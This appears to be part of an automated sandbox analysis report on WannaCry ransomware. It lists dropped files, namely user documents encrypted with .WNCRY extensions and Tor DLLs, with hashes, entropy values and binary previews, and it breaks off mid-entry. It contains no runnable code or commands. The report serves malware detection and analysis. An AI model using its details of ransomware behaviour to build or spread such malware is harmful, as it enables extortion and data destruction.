                                                  Preview:.V<..X.!.2h.H...R.a.....B.K\.?..V.....q.Ns....<C.}C./. .....JF.z=.b.0..G.............QD.....6...\..H..\.?m...E..dfo..O..D......(4|Y&T.._9....(/.dg..kn'U..N..F.Au.&..1dYq)./).....k.+.V...t..;(.'5..-.q...X.j.A.[oD..[|.j(.Up.1S@..Bn..~....w..F..s..J..L|...."..-....9.Wz/<.}.a..w..st....X.$...u..B.~....H(x..8.......9.....I..h.Dk.|....t+....<......O.J.C.m...'.&..[h...,..B.....a.....?W.#.c.uB..M.....T..4..wY_gi........qX........_.t..W..3$!.q.d.............c;w.j.j.`.E....<@.........)&..y.-...[}..6...PZ...`.8.....^.`..]..$....d.0.g.{+U..m.7...g7...`.......2.j...u.....`....j.~;...HCWpB...H...x.eNf..H.m2i.._......?...|.dIm.o...m.?.M6....*...'....iG.....d5...qW.t..5d.hM...F......W.R..!..d...Y.`...c.'.!.........y...)b....E..._.Ha.km%@V..K)Xf...7o#...m...up..G.:.T.Q..Ow)..%L')...O...9.i..........*.....$?...*....Y....]H>?.v(....c......:u..vu.';ik.........f$t....i.P.2.......~...T].=l..jn.....v.@'..U.d.n8af.....&}..........7.Vy.n...u......./....$}...R

                                                  C:\Users\user\Desktop\QNCYCDFIJJ.jpg.WNCRY (copy)

                                                  Download File
                                                  Process:C:\Users\user\Desktop\WannaCrypt0r.sk
                                                  File Type:data
                                                  Category:dropped
                                                  Size (bytes):1320
                                                  Entropy (8bit):7.854848930161475
                                                  Encrypted:false
                                                  SSDEEP:24:bk1W2Ur3QI/JmfWAzjBwlL1tQeSyRSNytV9seDUmjKET8/5GurA2LGmVNp/iNVEQ:bkxWJgpjy1tfSN+smUm+BrzLHp/iIjHI
                                                  MD5:8B452A8492494C521EDA704403B3CF4C
                                                  SHA1:2FAEA10F0005DF65429F8D19570063CAB10D3559
                                                  SHA-256:AFC65454F5B52794F41F9A4A2DD6162BE83D9E8B78E2B2FBC2502C83DC8E65A9
                                                  SHA-512:1D85E00F2BEF35C43ABF5E7B6162AE31E0259E326004306478D7A86851D6D05B9055630BD78CC66B2FAFAFEBADAEA05BDEF7B613D8D53C2845188BB7BD85B491
                                                  Malicious:false
                                                  Reputation:unknown
                                                  Preview:WANACRY!.....?.u..g....i".6H.X.n&...........z7puF..K$......6.....b.w......=.M..".Gsk...h].........=....'P.i .Jq.+.....CM`....U.E.#..H..?......4.jQ....>XY.<cT..I.`:........WI.l.7}....|..nr...,)}b...w..9J:fT.b.a.L.(aR.P.j..4...;Q..oA....bk.}......;O.3..y:................U./..Q.........uY..........0........:-..'.@..J....c.........&{.e.+.1.K......v........X&...F....e...4...`@.....$l..y.h.~...9..~.J..b]..)....&$......*.&.y.SWb...<?...k ...`.3.l2..g......./.B6[........I.g.8>.{*..N.Tf..P/...l.....W#.4c.4L.KG.9...[.....B...z..>.......Lem..0YE....F...._Z<R),..2t.;.$...."..z..eU....2.es.&c.8..".D....er...\..?.......b.....sC.#A^......H..K(..4.@!.0b.....5F.9J.u.....p..........M.S.........e)@*-...Y..Ha.Wmiu.lt....c`....s[.p...@.......m..6(..$.&..4.r....j.{.....,m.U...F...-.@...&@0A.7....1.k..H.".3./i<...u.J....X.c............s...7?.;..9.fN...7EU.^..(.6....d..H.<(sA..(N4.!...C.3BZ0s.{...#M5.g.){.3..@S..............".../."....+...d.~3".M....Z.,.{S...

                                                  C:\Users\user\Desktop\QNCYCDFIJJ.jpg.WNCRYT

                                                  Download File
                                                  Process:C:\Users\user\Desktop\WannaCrypt0r.sk
                                                  File Type:data
                                                  Category:dropped
                                                  Size (bytes):1320
                                                  Entropy (8bit):7.854848930161475
                                                  Encrypted:false
                                                  SSDEEP:24:bk1W2Ur3QI/JmfWAzjBwlL1tQeSyRSNytV9seDUmjKET8/5GurA2LGmVNp/iNVEQ:bkxWJgpjy1tfSN+smUm+BrzLHp/iIjHI
                                                  MD5:8B452A8492494C521EDA704403B3CF4C
                                                  SHA1:2FAEA10F0005DF65429F8D19570063CAB10D3559
                                                  SHA-256:AFC65454F5B52794F41F9A4A2DD6162BE83D9E8B78E2B2FBC2502C83DC8E65A9
                                                  SHA-512:1D85E00F2BEF35C43ABF5E7B6162AE31E0259E326004306478D7A86851D6D05B9055630BD78CC66B2FAFAFEBADAEA05BDEF7B613D8D53C2845188BB7BD85B491
                                                  Malicious:false
                                                  Reputation:unknown
                                                  Preview:WANACRY!.....?.u..g....i".6H.X.n&...........z7puF..K$......6.....b.w......=.M..".Gsk...h].........=....'P.i .Jq.+.....CM`....U.E.#..H..?......4.jQ....>XY.<cT..I.`:........WI.l.7}....|..nr...,)}b...w..9J:fT.b.a.L.(aR.P.j..4...;Q..oA....bk.}......;O.3..y:................U./..Q.........uY..........0........:-..'.@..J....c.........&{.e.+.1.K......v........X&...F....e...4...`@.....$l..y.h.~...9..~.J..b]..)....&$......*.&.y.SWb...<?...k ...`.3.l2..g......./.B6[........I.g.8>.{*..N.Tf..P/...l.....W#.4c.4L.KG.9...[.....B...z..>.......Lem..0YE....F...._Z<R),..2t.;.$...."..z..eU....2.es.&c.8..".D....er...\..?.......b.....sC.#A^......H..K(..4.@!.0b.....5F.9J.u.....p..........M.S.........e)@*-...Y..Ha.Wmiu.lt....c`....s[.p...@.......m..6(..$.&..4.r....j.{.....,m.U...F...-.@...&@0A.7....1.k..H.".3./i<...u.J....X.c............s...7?.;..9.fN...7EU.^..(.6....d..H.<(sA..(N4.!...C.3BZ0s.{...#M5.g.){.3..@S..............".../."....+...d.~3".M....Z.,.{S...

                                                  C:\Users\user\Desktop\QNCYCDFIJJ.xlsx

                                                  Download File
                                                  Process:C:\Users\user\Desktop\WannaCrypt0r.sk
                                                  File Type:data
                                                  Category:dropped
                                                  Size (bytes):1026
                                                  Entropy (8bit):7.803014480113174
                                                  Encrypted:false
                                                  SSDEEP:24:BK5mPTbhtiACDzIWISa9AqT0M9e42DOvvXBLKCxssQDHMQJGNs1tZPDR:BxbeACV+r0M9aDOvvXg2srrqs1PDR
                                                  MD5:349859A88A857CFEB5FA48B327DA598E
                                                  SHA1:B7245ED8862C33448A8489C0FA7C45F9FCE41554
                                                  SHA-256:C6C6791EF6689A9EB59CD1CD183469AF4F7CDEB6A01C450F0F9968A67D4F0932
                                                  SHA-512:F0C0F09675339DDC2EC6E36EA59F8B101E43211AAF6B1F861A446D4C80B6B8A081034F6B798B6BCA4B89B3D42E247ED4106BA6EB310BAA960D55B776CA0B0893
                                                  Malicious:false
                                                  Reputation:unknown
                                                  Preview:.B...>.+..H}a..$`.*.....'.....0._;)%-....x5../;......\@?..TS....v...g^.`;...7.......H7.......5<.f-#.>K`...D`'....V8....]..ed...\.v.L.y..bUf.w...;...b.S..;...x...e..}CW..bO..............h ....V.y.P....%(.V*RYF.r]R..wNO......M;.F...L.......8...o...c.0.v....V..L.... }rp ...p..4]}'...$...@.v....r.Q.P...R'T<`....!4.,...C..R.j.......DH...m8U..........J.d.......H..9..Jkt.A...j....U...rh).J...[.._..x...6:..JA=4l..........4uC...5...T.m.!.Y...@x+K..x2c_...%g.0....`....K!.T.!oP..mmD..?4=..ZG.....`..>.t.8..i.....v.'(.N.=4v.E.....\....I.3....{.D.G..c.......\'_.yo.:..C...........T...._......}/...v...O.q".....6..N.b....?.r.W.&f...f..Wx6....h..2j<.D...S.zk..Y........r..x.D).AC..y.?E$..+.J..........#jTlb.p...K..p.g.]*..Y..4RU.M...f$.....s..Fa<.....R_Z).H.,....JA..8.H.1.}.....M^...A....-.+......A8FA.\...V9w..F*%=+.%q..E..,......+.p....E...._...F......x..U...=....Z.d..r...L|.cp..s....e}........T.w.c.k.%n..%..%b|.........F....d5X...E.}.9G.k........5u7.M

                                                  C:\Users\user\Desktop\QNCYCDFIJJ.xlsx.WNCRY (copy)

                                                  Download File
                                                  Process:C:\Users\user\Desktop\WannaCrypt0r.sk
                                                  File Type:data
                                                  Category:dropped
                                                  Size (bytes):1320
                                                  Entropy (8bit):7.848988950255822
                                                  Encrypted:false
                                                  SSDEEP:24:bkNFo8YVVA5V4xhbLc/tDSuUcx9Y/cZ655f5nAunyqkIBu:bknKVV2Vsc/BQcfYUZ+5f7yqju
                                                  MD5:192993AE5377F06890B3BC1050167EBD
                                                  SHA1:AF0F05538B2AA90EF4BAFBFC04EB49920E07DA03
                                                  SHA-256:519D6EF2D3DA783D83310E539D48B0B1548745B49A794249EB090219FA5359B5
                                                  SHA-512:AC08046E805ED82923F942DD5FB87080EE7DFAAE07B5EE7A35C018A7554D8F44A35F3125110093B84BDFCC9E617D351C4FCB4C2A49F4C3B9BA128A50B315DA7E
                                                  Malicious:false
                                                  Reputation:unknown
                                                  Preview:WANACRY!.....!Q....`cj.C.Z'.".:B...>..M6.p<.......%<WM..U..0..{.7&y..U.).B.w....2-.S.../.....2.......l.M.{.V..5...s.zZ%nW.#...&i.....)..GI...o..3n.5..gyO...(b.6d...7ljy.@...aL..q~..UiK.a.....z.:wNYG.....P.h.a....v..@.F....,+.L..Q.)]D~..Tp.......;f.n ..W.nt................S.*...h=sH.......Q#...%~6d.Z.ir....gys..1C.h..o...a.x.K\M.....WH....:..Ae.d"...+,^....../.".<m....N.S..f.R}r...../....drg..\....+,.....8%.......z...9.h.Z.4W.n?....C.)<@...(.}...iZ.e~Y..A.W.lU..2f.>3.|.......?..n....N.k.v....;..~..$......b.h.r.a5P...v..t'...=.=......D.....k..;+Q..............^Q2.r...)v..C9..ti....*....T..S/..p4k.A..I.liq....p<6)P9F.....w.gRb.p.[....[....Sy.n..g.UrR.+.+..5U..o.._B.V2X.>.i...`*.6.qfG..A.\L...ZAu...\...C.R..G....JE...jx..Jp9........W...,....8..r.j..?A...M.......5k.....P..r\Q..t...C.e,......l...J?vq....uQXH.PpM~.i..J..X..*g=.(...N...Q.{x..5].b).H.$;E.. Hc...!/6.lN.f.....:..Y....9:#.0..s...f..?.....{..O.....ki{..\.80.......sN"}..d..f....0{...'.J..kg@jE...[....

                                                  C:\Users\user\Desktop\QNCYCDFIJJ.xlsx.WNCRYT

                                                  Download File
                                                  Process:C:\Users\user\Desktop\WannaCrypt0r.sk
                                                  File Type:data
                                                  Category:dropped
                                                  Size (bytes):1320
                                                  Entropy (8bit):7.848988950255822
                                                  Encrypted:false
                                                  SSDEEP:24:bkNFo8YVVA5V4xhbLc/tDSuUcx9Y/cZ655f5nAunyqkIBu:bknKVV2Vsc/BQcfYUZ+5f7yqju
                                                  MD5:192993AE5377F06890B3BC1050167EBD
                                                  SHA1:AF0F05538B2AA90EF4BAFBFC04EB49920E07DA03
                                                  SHA-256:519D6EF2D3DA783D83310E539D48B0B1548745B49A794249EB090219FA5359B5
                                                  SHA-512:AC08046E805ED82923F942DD5FB87080EE7DFAAE07B5EE7A35C018A7554D8F44A35F3125110093B84BDFCC9E617D351C4FCB4C2A49F4C3B9BA128A50B315DA7E
                                                  Malicious:false
                                                  Reputation:unknown
                                                  Preview:WANACRY!.....!Q....`cj.C.Z'.".:B...>..M6.p<.......%<WM..U..0..{.7&y..U.).B.w....2-.S.../.....2.......l.M.{.V..5...s.zZ%nW.#...&i.....)..GI...o..3n.5..gyO...(b.6d...7ljy.@...aL..q~..UiK.a.....z.:wNYG.....P.h.a....v..@.F....,+.L..Q.)]D~..Tp.......;f.n ..W.nt................S.*...h=sH.......Q#...%~6d.Z.ir....gys..1C.h..o...a.x.K\M.....WH....:..Ae.d"...+,^....../.".<m....N.S..f.R}r...../....drg..\....+,.....8%.......z...9.h.Z.4W.n?....C.)<@...(.}...iZ.e~Y..A.W.lU..2f.>3.|.......?..n....N.k.v....;..~..$......b.h.r.a5P...v..t'...=.=......D.....k..;+Q..............^Q2.r...)v..C9..ti....*....T..S/..p4k.A..I.liq....p<6)P9F.....w.gRb.p.[....[....Sy.n..g.UrR.+.+..5U..o.._B.V2X.>.i...`*.6.qfG..A.\L...ZAu...\...C.R..G....JE...jx..Jp9........W...,....8..r.j..?A...M.......5k.....P..r\Q..t...C.e,......l...J?vq....uQXH.PpM~.i..J..X..*g=.(...N...Q.{x..5].b).H.$;E.. Hc...!/6.lN.f.....:..Y....9:#.0..s...f..?.....{..O.....ki{..\.80.......sN"}..d..f....0{...'.J..kg@jE...[....

                                                  C:\Users\user\Desktop\SQSJKEBWDT.png

                                                  Download File
                                                  Process:C:\Users\user\Desktop\WannaCrypt0r.sk
                                                  File Type:data
                                                  Category:dropped
                                                  Size (bytes):1026
                                                  Entropy (8bit):7.813197753571645
                                                  Encrypted:false
                                                  SSDEEP:24:BzB8zp47kWFOTLz3yiVhUQ04AiDqMgvvHJuRU/4DHtsQiGdLdJ:Bd8zp47wTLbyiVuQkiDqMYH8RUwpsGN
                                                  MD5:E7052018C1BE7B7677F78ADE82211F90
                                                  SHA1:09EF9694FFA1F1DDC0F0282BEB99DE007DA1B8A5
                                                  SHA-256:25BFD3CCD1DFF80E4F2A602F5B71E9B173F42791655629179E4C6F842CEC44F5
                                                  SHA-512:ECA28F7D61C5E7FAF470678F987232B9D9548E68C9383203CF2591922D46634AF8187B844B9F0F23A28961EB8E74DBDF65CB2D0ED97FB6DB967507187C4B2EEC
                                                  Malicious:false
                                                  Reputation:unknown
                                                  Preview:..g...9.gk...I./.Y.....7..w.X ...@DX..H.....%...Pln.....Uq..Rq.....%.i...VxGS..q.~-..I...!...w.;...T+.\.....-.`'J.gO-..d.*|..o...$V.cR.*...l....I.O.vz}..l..ut.4.d...2A..NF..~.2..cw....h..u (./..Y.=..V..cCk.*.DZ...t...',6.T...../...P.a..K......{.@Z.....u....r.d...B;U..C.;.VV.p..~..l..m..._5..RL.Z-l....9t.pr...iz*...#....v..w......]...n....b....._....Jx#........ M..].G#.T.gM.V....P.c.i..3.W.U...k...tW.1...m/=.vN_m.....N....#5O._.uDY..gh%..e|......P.........I...x`.....'x/.t$.%}^.C...j.......(...)..U.1L!$........}.2.]..].C..{.|......"9G"l.(....!.^..Zr..d/a..O.}B..Kg$...v..m.!h*..L....jCm..6.....`......bZ..i.....4....T_../)w..=...a..<....5}..}..=_uE{....2bMz.....$.?LHX@..|.S........g.ubx,.3...Gy.5..<...VC.^.NJ..bu."}.".$....2p.U..s.;..h...|W..../.n... ).i..KfX.pVU.a...:O.......S...E....".7Y..t....f...[".B..w7.j.:. ....i..@...7...7../H.8>...dP.;.9Z.2.....UkY.%5.:.Q>.&268.<......!.Ul.It....d.EM.I..[JN...Wo..G...1..o.&...]{.zr...67U..'9.......j

                                                  C:\Users\user\Desktop\SQSJKEBWDT.png.WNCRY (copy)

                                                  Download File
                                                  Process:C:\Users\user\Desktop\WannaCrypt0r.sk
                                                  File Type:data
                                                  Category:dropped
                                                  Size (bytes):1320
                                                  Entropy (8bit):7.824841768754727
                                                  Encrypted:false
                                                  SSDEEP:24:bkVmGSkgHwjW83xTwfqQcRiKdnTPO0O5gJLuUDncT2NZ9CyBJ6JuV4i05800Xrrn:bkVcwjW8BTAcAKdnDO0OaLFcTU3u6h0a
                                                  MD5:F2F3F5FAFDDA4C648C472F2B2947E4D6
                                                  SHA1:145AFC4AD195584B541A4E8BC48DD987ED63403E
                                                  SHA-256:BBC6081C97635B0A76168251518E7753E3D857B8CC05FCA8184F05D33154EEF6
                                                  SHA-512:AAED33AA266D208B1AA04E9400C26D9C20969E9B6DC68C8D631B6CC0FA96424A5DD8FF7322DF498015BDA6959D1968D884202F1EC6E9E72D6AC9B4953943619D
                                                  Malicious:false
                                                  Reputation:unknown
                                                  Preview:WANACRY!....wo.'...-...hD.wH.`.....[..,.........N..f+...<n.$...z..n..".#.....J@.>.,.H....Z;z>.g=.....>.L.6.......9..%.K3.Y..bM..F.m.)R..g.8.{.4@3.'...W a.5.=.}.....;3..... ...R.b4..R,..87.z5..Co..g..Ha.(A.3../.....>... ..a.UH..,MY.(F9{..8.+.O.; ................9....W...4..v9..]2....=a.OXJ..l.,i.9...e,9...s...3.F.Q.......dW.`.~.011..Y.."...r..R....$..sz.{..M...|..6*:q.U.w.L...Z.a.s....B..Z...8..@(.Gh...1.:.Qu.g..M..6.S...R.S....V?..,...;_..2..-c...V.Z:v..99xl.YJ.}Pb..3.2.o...]m...0...w..=.0JI...i1?...R`*..Fm..e.Tr..|.#y...Z...+.........9.r.v..f..=~...E...4Q....q.~..o.y.K$.....J.b....W.*..z..(.....lL..}C....Z..':/W...9..._d.B.i]...ld...............o....5i....!..p..}$.......N4_...........L...%.d.s.J.....-s..qr!.....;I....z'....Qs.&h.8#..A_2.>C....b..Mo......Laqf..B...9.#....TK..@.;#G...."C!i6.m.e.L....p....C........a..2........`Y.>.A...q.....la;I..e.q..!../.'g.s.j8.\3.J......T.t[.;q&.....2z<?$..(...jl.^...`.v#.R..l.{....%}.,p....q.,.@...?.

                                                  C:\Users\user\Desktop\SQSJKEBWDT.png.WNCRYT

                                                  Download File
                                                  Process:C:\Users\user\Desktop\WannaCrypt0r.sk
                                                  File Type:data
                                                  Category:dropped
                                                  Size (bytes):1320
                                                  Entropy (8bit):7.824841768754727
                                                  Encrypted:false
                                                  SSDEEP:24:bkVmGSkgHwjW83xTwfqQcRiKdnTPO0O5gJLuUDncT2NZ9CyBJ6JuV4i05800Xrrn:bkVcwjW8BTAcAKdnDO0OaLFcTU3u6h0a
                                                  MD5:F2F3F5FAFDDA4C648C472F2B2947E4D6
                                                  SHA1:145AFC4AD195584B541A4E8BC48DD987ED63403E
                                                  SHA-256:BBC6081C97635B0A76168251518E7753E3D857B8CC05FCA8184F05D33154EEF6
                                                  SHA-512:AAED33AA266D208B1AA04E9400C26D9C20969E9B6DC68C8D631B6CC0FA96424A5DD8FF7322DF498015BDA6959D1968D884202F1EC6E9E72D6AC9B4953943619D
                                                  Malicious:false
                                                  Reputation:unknown
                                                  Preview:WANACRY!....wo.'...-...hD.wH.`.....[..,.........N..f+...<n.$...z..n..".#.....J@.>.,.H....Z;z>.g=.....>.L.6.......9..%.K3.Y..bM..F.m.)R..g.8.{.4@3.'...W a.5.=.}.....;3..... ...R.b4..R,..87.z5..Co..g..Ha.(A.3../.....>... ..a.UH..,MY.(F9{..8.+.O.; ................9....W...4..v9..]2....=a.OXJ..l.,i.9...e,9...s...3.F.Q.......dW.`.~.011..Y.."...r..R....$..sz.{..M...|..6*:q.U.w.L...Z.a.s....B..Z...8..@(.Gh...1.:.Qu.g..M..6.S...R.S....V?..,...;_..2..-c...V.Z:v..99xl.YJ.}Pb..3.2.o...]m...0...w..=.0JI...i1?...R`*..Fm..e.Tr..|.#y...Z...+.........9.r.v..f..=~...E...4Q....q.~..o.y.K$.....J.b....W.*..z..(.....lL..}C....Z..':/W...9..._d.B.i]...ld...............o....5i....!..p..}$.......N4_...........L...%.d.s.J.....-s..qr!.....;I....z'....Qs.&h.8#..A_2.>C....b..Mo......Laqf..B...9.#....TK..@.;#G...."C!i6.m.e.L....p....C........a..2........`Y.>.A...q.....la;I..e.q..!../.'g.s.j8.\3.J......T.t[.;q&.....2z<?$..(...jl.^...`.v#.R..l.{....%}.,p....q.,.@...?.

                                                  C:\Users\user\Desktop\TaskData\Tor\libeay32.dll

                                                  Download File
                                                  Process:C:\Users\user\Desktop\@WanaDecryptor@.exe
                                                  File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                                  Category:dropped
                                                  Size (bytes):3197106
                                                  Entropy (8bit):6.130063064844696
                                                  Encrypted:false
                                                  SSDEEP:98304:W5FYc9YouOquJVqrR1LlZRUT83DlJrqd+kq:WrjYouOquJgrlZ283xFqdq
                                                  MD5:6ED47014C3BB259874D673FB3EAEDC85
                                                  SHA1:C9B29BA7E8A97729C46143CC59332D7A7E9C1AD8
                                                  SHA-256:58BE53D5012B3F45C1CA6F4897BECE4773EFBE1CCBF0BE460061C183EE14CA19
                                                  SHA-512:3BC462D21BC762F6EEC3D23BB57E2BAF532807AB8B46FAB1FE38A841E5FDE81ED446E5305A78AD0D513D85419E6EC8C4B54985DA1D6B198ACB793230AEECD93E
                                                  Malicious:true
                                                  Antivirus:
                                                  • Antivirus: ReversingLabs, Detection: 0%
                                                  Reputation:unknown
                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......... ........!.....J... ..0...........`.....c..........................!.......0...@... .........................A....`..\.......<.......................h...................................................4c...............................text....H.......J..................`.p`.data...\d...`...f...P..............@.`..rdata..............................@.`@.bss.........p........................`..edata..A............V..............@.0@.idata..\....`......................@.0..CRT....,...........................@.0..tls.... ............ ..............@.0..rsrc...<............"..............@.0..reloc..h............(..............@.0B/4............ ......& .............@.@B/19.....;z.... ..|...( .............@..B/31.....`....@!....... .............@..B/45.....'....`!....... .............@..B/57...........!....... .............@.0B/70.....".....!....... .

                                                  C:\Users\user\Desktop\TaskData\Tor\libevent-2-0-5.dll

                                                  Download File
                                                  Process:C:\Users\user\Desktop\@WanaDecryptor@.exe
                                                  File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                  Category:dropped
                                                  Size (bytes):719217
                                                  Entropy (8bit):5.981438230537172
                                                  Encrypted:false
                                                  SSDEEP:6144:Ir2r5rFriGKbgai112Yq/5hcQTcGzAHzSHeqoftOEEdD4B2pihSpKOKm:naiV25uQTcGzAHOEW+Pzm
                                                  MD5:90F50A285EFA5DD9C7FDDCE786BDEF25
                                                  SHA1:54213DA21542E11D656BB65DB724105AFE8BE688
                                                  SHA-256:77A250E81FDAF9A075B1244A9434C30BF449012C9B647B265FA81A7B0DB2513F
                                                  SHA-512:746422BE51031CFA44DD9A6F3569306C34BBE8ABF9D2BD1DF139D9C938D0CBA095C0E05222FD08C8B6DEAEBEF5D3F87569B08FB3261A2D123D983517FB9F43AE
                                                  Malicious:true
                                                  Antivirus:
                                                  • Antivirus: ReversingLabs, Detection: 0%
                                                  Reputation:unknown
                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L........t.........!.....@...................P.....e......................... ............@... ......................P..4H......................................t+.....................................................4............................text...T?.......@..................`.P`.data........P.......F..............@.`..rdata.. ....`.......J..............@.`@.bss.........0........................`..edata..4H...P...J..................@.0@.idata...............X..............@.0..CRT....,............h..............@.0..tls.... ............j..............@.0..reloc..t+.......,...l..............@.0B/4..................................@.@B/19.................................@..B/31......(.......*...|..............@..B/45.....1*... ...,..................@..B/57..........P......................@.0B/70.....v....p......................@..B/81....................

                                                  C:\Users\user\Desktop\TaskData\Tor\libevent_core-2-0-5.dll

                                                  Download File
                                                  Process:C:\Users\user\Desktop\@WanaDecryptor@.exe
                                                  File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                  Category:dropped
                                                  Size (bytes):417759
                                                  Entropy (8bit):5.853358941151938
                                                  Encrypted:false
                                                  SSDEEP:6144:g8r2rQrFr0XGXnZ7rvzRsiWqnjmYl5oHIH9A:gtXGJnvmiggA
                                                  MD5:E5DF3824F2FCAD0C75FD601FCF37EE70
                                                  SHA1:902418A4C5F3684DBA5E3246DE8C4E21C92D674E
                                                  SHA-256:5CD126B4F8C77BDF0C5C980761A9C84411586951122131F13B0640DB83F792D8
                                                  SHA-512:7E70889B46B54175C6BADA7F042F5730CA7E3D156F7B6711FDF453911E4F78D64A2A8769EB8F0E33E826A3B30E623B3CD4DAF899D9D74888BB3051F08CF34461
                                                  Malicious:true
                                                  Antivirus:
                                                  • Antivirus: ReversingLabs, Detection: 0%
                                                  Reputation:unknown
                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...........k......!.....`...4...............p.....b......................................@... ..............................@...............................p...............................`......................pB...............................text...._.......`..................`.P`.data........p.......f..............@.`..rdata..xr.......t...j..............@.`@.bss..................................`..edata...........0..................@.0@.idata.......@......................@.0..CRT....,....P......................@.0..tls.... ....`......................@.0..reloc.......p....... ..............@.0B/4......P............:..............@.@B/19.................>..............@..B/31..........0......................@..B/45..........P......................@..B/57.....<....p......................@.0B/70....."...........................@..B/81.....B...............

                                                  C:\Users\user\Desktop\TaskData\Tor\libevent_extra-2-0-5.dll

                                                  Download File
                                                  Process:C:\Users\user\Desktop\@WanaDecryptor@.exe
                                                  File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                  Category:dropped
                                                  Size (bytes):411369
                                                  Entropy (8bit):5.909395689751269
                                                  Encrypted:false
                                                  SSDEEP:3072:oLQzG3CaDYuKCsZW9p2M8suCOSNKOM0LE5BtBsxvQkVgA2+FOYtLEgZEVPSm0aQY:oWHMACLoYaQ2bj+b0pJ
                                                  MD5:6D6602388AB232CA9E8633462E683739
                                                  SHA1:41072CC983568D8FEEB3E18C4B74440E9D44019A
                                                  SHA-256:957D58061A42CA343064EC5FB0397950F52AEDF0594A18867D1339D5FBB12E7E
                                                  SHA-512:B37BF121EA20FFC16AF040F8797C47FA8588834BC8A8115B45DB23EE5BFBEBCD1E226E9ACAB67B5EE43629A255FEA2CEEE4B3215332DD4127F187EE10244F1C3
                                                  Malicious:true
                                                  Antivirus:
                                                  • Antivirus: ReversingLabs, Detection: 0%
                                                  Reputation:unknown
                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L........b.........!...............................l......................... ............@... .................................................................h...................................................L................................text...............................`.P`.data...............................@.`..rdata..DR... ...T..................@.`@.bss..................................`..edata...............T..............@.0@.idata...............p..............@.0..CRT....,...........................@.0..tls.... ...........................@.0..reloc..h...........................@.0B/4......8...........................@.@B/19.....W.... ......................@..B/31......%.......&...v..............@..B/45......&...0...(..................@..B/57..........`......................@.0B/70.....v....p......................@..B/81.....................

                                                  C:\Users\user\Desktop\TaskData\Tor\libgcc_s_sjlj-1.dll

                                                  Download File
                                                  Process:C:\Users\user\Desktop\@WanaDecryptor@.exe
                                                  File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                                  Category:dropped
                                                  Size (bytes):523262
                                                  Entropy (8bit):5.7796587531390795
                                                  Encrypted:false
                                                  SSDEEP:6144:+ymz8Jq1p95avGpuO+/jUE8ADu2kNBMY8KHNygoB0+6tMqSsVwvN:+ylSZ+/jU7ynIK5Bb6Y
                                                  MD5:73D4823075762EE2837950726BAA2AF9
                                                  SHA1:EBCE3532ED94AD1DF43696632AB8CF8DA8B9E221
                                                  SHA-256:9AECCF88253D4557A90793E22414868053CAAAB325842C0D7ACB0365E88CD53B
                                                  SHA-512:8F4A65BD35ED69F331769AAF7505F76DD3C64F3FA05CF01D83431EC93A7B1331F3C818AC7008E65B6F1278D7E365ED5940C8C6B8502E77595E112F1FACA558B5
                                                  Malicious:true
                                                  Antivirus:
                                                  • Antivirus: ReversingLabs, Detection: 0%
                                                  Reputation:unknown
                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L..................!.....B...p...............`.....l.........................p......5(....@... .................................l....................................................................................................................text...X@.......B..................`.P`.data...8....`.......H..............@.0..rdata..<....p.......J..............@.`@.bss..................................`..edata...............Z..............@.0@.idata..l............f..............@.0..CRT....,............l..............@.0..tls.... ............n..............@.0..reloc...............p..............@.0B/4...................v..............@.@B/19.....Du.......v..................@..B/31....._o...p...p..................@..B/45..................l..............@..B/57.....|-...p......................@.0B/70.....J...........................@..B/81.................(..

                                                  C:\Users\user\Desktop\TaskData\Tor\libssp-0.dll

                                                  Download File
                                                  Process:C:\Users\user\Desktop\@WanaDecryptor@.exe
                                                  File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                                  Category:dropped
                                                  Size (bytes):92599
                                                  Entropy (8bit):5.351249974009154
                                                  Encrypted:false
                                                  SSDEEP:1536:pEiL38qIuOFcErNX5d0tRCZiBP2DrbjgpfM2ydbv:aiLsqIHFPpdiU2q
                                                  MD5:78581E243E2B41B17452DA8D0B5B2A48
                                                  SHA1:EAEFB59C31CF07E60A98AF48C5348759586A61BB
                                                  SHA-256:F28CAEBE9BC6AA5A72635ACB4F0E24500494E306D8E8B2279E7930981281683F
                                                  SHA-512:332098113CE3F75CB20DC6E09F0D7BA03F13F5E26512D9F3BEE3042C51FBB01A5E4426C5E9A5308F7F805B084EFC94C28FC9426CE73AB8DFEE16AB39B3EFE02A
                                                  Malicious:true
                                                  Antivirus:
                                                  • Antivirus: ReversingLabs, Detection: 0%
                                                  Reputation:unknown
                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L..................!.........4...............0.....h................................<.....@... ......................`..i....p..................................@....................................................q...............................text...............................`.P`.data........0......."..............@.0..rdata..h....@.......$..............@.0@.bss.........P........................`..edata..i....`.......*..............@.0@.idata.......p.......,..............@.0..CRT....,............2..............@.0..tls.... ............4..............@.0..reloc..@............6..............@.0B/4...................:..............@.@B/19.....n|.......~...<..............@..B/31..........@......................@..B/45..........`......................@..B/57.....$...........................@.0B/70....."...........................@..B/81.....w...............

                                                  C:\Users\user\Desktop\TaskData\Tor\ssleay32.dll

                                                  Download File
                                                  Process:C:\Users\user\Desktop\@WanaDecryptor@.exe
                                                  File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                                  Category:dropped
                                                  Size (bytes):711459
                                                  Entropy (8bit):5.884120014912355
                                                  Encrypted:false
                                                  SSDEEP:12288:hXhKnXI0Fkw80VEJtzwIA6Ouah6ESyrWlp36Z:thKnnkw80VEJtzwIAiazSxlFw
                                                  MD5:A12C2040F6FDDD34E7ACB42F18DD6BDC
                                                  SHA1:D7DB49F1A9870A4F52E1F31812938FDEA89E9444
                                                  SHA-256:BD70BA598316980833F78B05F7EEAEF3E0F811A7C64196BF80901D155CB647C1
                                                  SHA-512:FBE0970BCDFAA23AF624DAAD9917A030D8F0B10D38D3E9C7808A9FBC02912EE9DAED293DBDEA87AA90DC74470BC9B89CB6F2FE002393ECDA7B565307FFB7EC00
                                                  Malicious:true
                                                  Antivirus:
